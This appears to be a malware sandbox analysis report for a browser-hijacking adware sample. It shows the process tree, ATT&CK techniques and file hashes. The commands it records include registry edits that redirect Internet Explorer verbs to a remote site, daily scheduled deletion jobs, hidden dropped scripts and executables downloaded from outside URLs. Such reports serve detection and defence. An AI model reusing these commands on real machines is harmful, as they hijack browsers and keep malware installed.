  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1564
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
      4⤵
      PID:1556
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:916
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:412
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:2856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:1888
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:3664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
      4⤵
      Modifies registry class
      PID:4572
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:2536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:4516
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2252
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:2632
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:2208
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:3008
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:4024
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:636
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4156
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1164
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:3588
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:3732
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4436
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1076
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:232
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4412
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:3192
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:436
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1508
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2396
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1852
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3264
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1072
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:452
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:4632
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:728
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:880
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:4076
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1556
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2484
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:1428
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:680
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:4168
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4476
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:3280
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:3048
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:736
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:976
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
      4⤵
      PID:2556
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:3368
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1164
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:3588
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:4156
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:3732
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"
      4⤵
      PID:1472
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"
      4⤵
      PID:8
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:232
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:684
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:2584
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2284
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Modifies registry class
      Views/modifies file attributes
      PID:4592
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2024
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2380
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Modifies registry class
      Views/modifies file attributes
      PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    PID:4112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
      ".\msn.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3792
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        
        PID:976
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"
        5⤵
        Executes dropped EXE
        
        PID:4660

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Modifies registry class
PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WinWare\360.cmd

Filesize
1KB

MD5
20c2b9872ca6f858414a9251ae37dede

SHA1
853438b13ee186dcc87d2196781e154289749a0f

SHA256
e22076817c4391fcb6c373a2b5c89c79f814e30534316b4627661151a54aa2bf

SHA512
716a0ec68f92ef32ce74718e18b56c16095c0a35d29c47e63bdd1d8e8c44967541908cdf9d4ded7906c622c80773f63495c36743ec006a9dc53eed0f429b0192

Download Submit
C:\Program Files\WinWare\361.cmd

Filesize
575B

MD5
1e9b64c129e313ec49378f5b823b2ca6

SHA1
21ecde39469900b9bd551f4a9576c5a9564d4d60

SHA256
87334dcec453b142801040c3084219f840a531c94553f06ee817192c121207ee

SHA512
0178907df2fa444f463c4c9604bffa7007569daa61b1905dee1b850c9a50754b6bf90c70364ccfc65a609d2dee9f902eefc4b564afcc37fdb253cdfe0bfba840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verC6AB.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QSO8CY24\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs

Filesize
215B

MD5
89ec051ab621ccd6ab684bb0f17a25ce

SHA1
1ef2b94c285bfb602892a6e42b1f4b5ba645315f

SHA256
0dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3

SHA512
2ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs

Filesize
193B

MD5
327cff8c30e74afc5af67a19d82774e5

SHA1
13e1be20402e16f7dbf0d86c00f626070f8c9d16

SHA256
bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9

SHA512
0e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs

Filesize
1KB

MD5
3f60b1c32c66c4fafe67b131c81b537e

SHA1
abacf3653d89eff785c76bc9de685210da67409d

SHA256
306fc7e0980c7e21adf92b220204dfa36baf0f5d107f7de0a167a92f35818a94

SHA512
20fcf8215876e448b4d1bfbe8a6ff167cfdb262183364138560b6d5740da0dbf7f0a723763bfc3743240b6fea6fa5f1fa4e25a14a5edb54271bbd7e97fff727a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk

Filesize
104B

MD5
b6090a24bad18a0205bb215cb1fd42e6

SHA1
da56e637a186333e1fa8401b9600e9efcadbe86b

SHA256
5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8

SHA512
